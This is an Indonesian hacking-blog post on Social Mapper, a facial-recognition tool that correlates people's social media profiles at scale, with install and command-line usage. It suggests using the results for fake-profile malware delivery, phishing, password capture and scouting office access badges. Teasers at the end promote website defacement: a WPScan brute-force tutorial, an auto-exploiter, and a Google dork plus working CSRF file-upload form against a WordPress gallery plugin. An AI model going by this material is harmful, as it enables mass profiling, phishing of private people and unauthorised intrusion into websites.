Skip to main content

Social Mapper - Alat Pemetaan Sosmed Melalui Pengenalan Wajah

By
squadcyber - Social Mapper adalah Alat Pemetaan Media Sosial yang menghubungkan profil melalui pengenalan wajah oleh Jacob Wilkin (Greenwolf)
Pemeta Sosial adalah Perangkat Intelijen Sumber Terbuka yang menggunakan pengenalan wajah untuk mengkorelasikan profil media sosial di berbagai situs dalam skala besar. Diperlukan pendekatan otomatis untuk mencari situs media sosial populer untuk nama target dan gambar untuk secara akurat mendeteksi dan mengelompokkan keberadaan seseorang, menampilkan hasilnya ke dalam laporan yang dapat segera diperiksa oleh operator manusia.
Pemeta Sosial memiliki berbagai kegunaan dalam industri keamanan, misalnya pengumpulan otomatis sejumlah besar profil media sosial untuk digunakan pada kampanye phishing yang ditargetkan. Pengenalan wajah membantu proses ini dengan menghapus positif palsu dalam hasil pencarian, sehingga meninjau data ini lebih cepat untuk operator manusia.

Social Mapper Mendukung Beberapa Platform Media Sosial Sebegai Berikut :

  • LinkedIn
  • Facebook
  • Twitter
  • Google Plus
  • Instagram
  • VKontakte
  • Weibo
  • Douban

  Social Mapper mengambil berbagai jenis masukan seperti:

  • Nama organisasi, pencarian melalui LinkedIn
  •  Folder penuh gambar yang dinamai
  • File CSV dengan nama dan url ke gambar secara online ”

Use Cases (Mengapa Anda ingin menjalankan ini)

Social Mapper terutama ditujukan pada Penetration Testers dan Red Teamers, yang akan menggunakannya untuk memperluas daftar target mereka dan menemukan profil media sosial mereka. Dari sini apa yang Anda lakukan hanya dibatasi oleh imajinasi Anda, tetapi berikut beberapa ide untuk memulai:
(Catatan: Social Mapper tidak melakukan serangan ini, ini mengumpulkan Anda data yang Anda butuhkan untuk melakukan mereka dalam skala massal.)
  • Membuat profil media sosial palsu untuk 'berteman' dengan target dan mengirimkan tautan atau malware kepada mereka. Statistik terbaru menunjukkan pengguna media sosial lebih dari dua kali kemungkinan mengklik tautan dan membuka dokumen dibandingkan dengan yang dikirim melalui email. 
  • Trick pengguna agar mengungkapkan email dan nomor telepon mereka dengan voucher dan penawaran untuk menjadikan pivot menjadi phishing, vishing, atau smishing.
  • Buat kampanye phishing khusus untuk setiap situs media sosial, mengetahui bahwa target memiliki akun. Jadikan ini lebih realistis dengan menyertakan gambar profil mereka di email. Tangkap kata sandi untuk penggunaan kembali kata sandi.  
  • Lihat foto target mencari lencana kartu akses karyawan dan biasakan diri Anda dengan membangun interior.

 Cara Install Social Mapper

Karena ini adalah alat berbasis python, itu harus dijalankan secara teoritis di Linux, Mac dan Windows. Syarat utamanya adalah Firefox, Selenium dan Geckodriver. Untuk menginstal alat dan mengaturnya ikuti 4 langkah berikut:
Instal Mozilla Firefox versi terbaru di sini.

 Instal Geckodriver untuk sistem operasi Anda dan pastikan itu di jalan Anda, di Mac Anda dan letakkan di / usr / local / bin dan di Linux / usr / bin. Anda dapat mengunduhnya di sini

$ apt-get install python2
$ git clone https://github.com/SpiderLabs/social_mapper
$ cd social_mapper/setup
$ pip install -r requirements.txt

Cara Menggunakan Social Mapper

Social Mapper dijalankan dari baris perintah menggunakan campuran parameter wajib dan opsional. Anda dapat menentukan opsi seperti jenis input dan situs mana yang harus diperiksa bersama sejumlah parameter lain yang memengaruhi kecepatan dan keakuratan.
Parameter yang DiperlukanUntuk memulai alat, 4 parameter harus disediakan, format input, file atau folder masukan, dan mode berjalan dasar:

-f, --format: Tentukan jika -i, --input adalah file resume 'nama', 'csv', 'imagefolder' atau 'socialmapper'
-i, --input: Nama perusahaan, file csv, imagefolder atau file html social mapper untuk dimasukkan ke mapper sosial
-m, --mode: Cepat atau Akurat memungkinkan Anda memilih untuk melewati target potensial setelah kemungkinan kecocokan pertama ditemukan, dalam beberapa kasus berpotensi mempercepat program x20

Selain itu setidaknya satu situs media sosial untuk memeriksa harus dipilih dengan memasukkan satu atau lebih dari yang berikut:

-a, --all: Memilih semua opsi di bawah dan memeriksa setiap situs yang memiliki kredensial mapper sosial
-fb, --facebook: Periksa Facebook
-tw, --twitter: Periksa Twitter
-ig, --instagram: Periksa Instagram
-li, --linkedin: Periksa LinkedIn
-gp, --googleplus: Periksa GooglePlus
-vk, --vkontakte: Periksa VKontakte
-wb, --weibo: Periksa Weibo
-db, --douban: Periksa Douban

Parameter OpsionalParameter opsional tambahan juga dapat disetel untuk menambahkan penyesuaian tambahan ke cara pemetaan sosial berjalan:

-t, --threshold: Mempersonalisasi ambang pengenalan wajah untuk pertandingan, ini dapat dilihat sebagai akurasi pertandingan. Defaultnya adalah 'standar', tetapi dapat diatur untuk longgar, standar, ketat atau superstrict. Misalnya longgar akan menemukan lebih banyak pertandingan, tetapi beberapa mungkin salah. Meskipun ketat mungkin menemukan kecocokan yang kurang tetapi juga mengandung lebih sedikit kesalahan positif dalam laporan akhir.
-cid, --companyid: Parameter tambahan untuk ditambahkan dalam ID Perusahaan LinkedIn karena jika pencarian nama tidak memilih perusahaan yang benar.
-s, --showbrowser: Membuat browser Firefox terlihat sehingga Anda dapat melihat penelusuran yang dilakukan. Berguna untuk debugging.
-v, --version: Menampilkan versi saat ini
Contoh Penggunaan
Berikut beberapa contoh untuk memulai untuk berbagai kasus penggunaan:
Menjalankan cepat untuk facebook dan twitter pada beberapa target yang Anda miliki di sebuah folder gambar, yang Anda rencanakan untuk ditinjau secara manual dan tidak keberatan dengan beberapa kesalahan palsu:
python social_mapper.py -f imagefolder -i ./mytargets -m fast -fb -tw

Jangkauan mendalam pada perusahaan besar di mana kesalahan positif harus dijaga seminimal mungkin:
python social_mapper.py -f company -i "SpiderLabs" -m accurate -a -t strict
 
Jalankan besar yang perlu dipecah atas beberapa sesi karena waktu, lari pertama 
melakukan LinkedIn dan Facebook, dengan melanjutkan kedua dan mengisi 
Twitter, Google Plus dan Instagram:
python social_mapper.py -f company -i "SpiderLabs" -m accurate -li -fb
python social_mapper.py -f socialmapper -i ./SpiderLabs-social-mapper-linkedin-facebook.html -m accurate -tw -gp -ig
Labels:

Comments

Post a Comment

Popular posts from this blog

XAttacker Website Vulnerability Scanner & Auto Exploiter 

By
squadcyber.org - XAttacker adalah Website Vulnerability Scanner & Auto Exploiteryang di tulis dalam bahasa pemrograman Perl untuk menganalisis sebuah celah web dan meng eksploitasi nya secara otomatis. Tool ini fungsi nya hampir sama seperti yang gw posting sebelum nya yaitu Mr. Spy Bot Auto Deface   . Fitur   Auto Cms Detect [1] WordPress : [+] Adblock Blocker [+] WP All Import [+] Blaze [+] Catpro [+] Cherry Plugin [+] Download Manager [+] Formcraft [+] Power Zoomer [+] Gravity Forms [+] Revslider Upload Shell [+] Revslider Dafece Ajax [+] Revslider Get Config [+] Showbiz [+] Simple Ads Manager [+] Slide Show Pro [+] WP Mobile Detector [+] Wysija [+] InBoundio Marketing [+] dzs-zoomsounds [+] Reflex Gallery [+] Creative Contact Form [+] Work The Flow File Upload [+] WP Job Manger [+] PHP Event Calendar [+] Synoptic [+] Wp Shop [+] Content Injection [2] Joomla [+] Com Jce [+] Com Media [+] Com Jdownloads ...
5 comments
Read more

Deface Wordpress Bruteforce dengan WPScan

By
squadcyber.org  - Kali ini gw bagiin tutorial Deface Wordpress Bruteforce dengan WPScan, kenapa WPScan ? kenapa nggak pake tools yang lainnya?. Karena menurut gw tool yang paling manjur untuk Penetration Testing sebuah web yang menggunakan CMS Wordpress adalah WPScan, dan WPScan sering melakukan update pada database nya sehingga bisa memberikan refrensi untuk bug yang di dapat pada waktu scan bug di web tersebut dan bisa meng eksploitasi Web yang menggunakan CMS Wordpress terbaru. Bahan - Bahan  - WPScan ( Untuk Windows bisa kalian lihat di sini , dan untuk android bisa kalian lihat Di sini  )  - Wordlist ( Download Di sini  atau kalian bisa buat sendiri) Dork    - inurl:/wp-login.php (kembangin lagi) Cara Deface Wordpress Bruteforce kali ini gw pake Termux ( android ) karena minim nya fasilitas yang ada :v. Pertama kalian busa folder wpscan nya dengan mengetik $ cd wpscan Setelah masuk di folder wpscan nya , kita scan dulu ...
Post a Comment
Read more

Deface Dengan Metode Wordpress Plugin DreamWorkGallery

By
www.squadcyber.org - Yo guys, balik lagi ma ane :v kali ini wa mau kasih tutor pepes pakek metode  Wordpress Plugin DreamWorkGallery. Langsung yok :v Bahan" : Dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ (kembangin ea) CSRF : <form action="http://www.site.co.li/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value=""/> <input type="submit" value="SIKAT!" /></form>  Langsung :v 1. Dorking pakek dork diatas   2. Kalo gini vuln :v Copy url web nya doang. Lalu masukin di CSR...
Post a Comment
Read more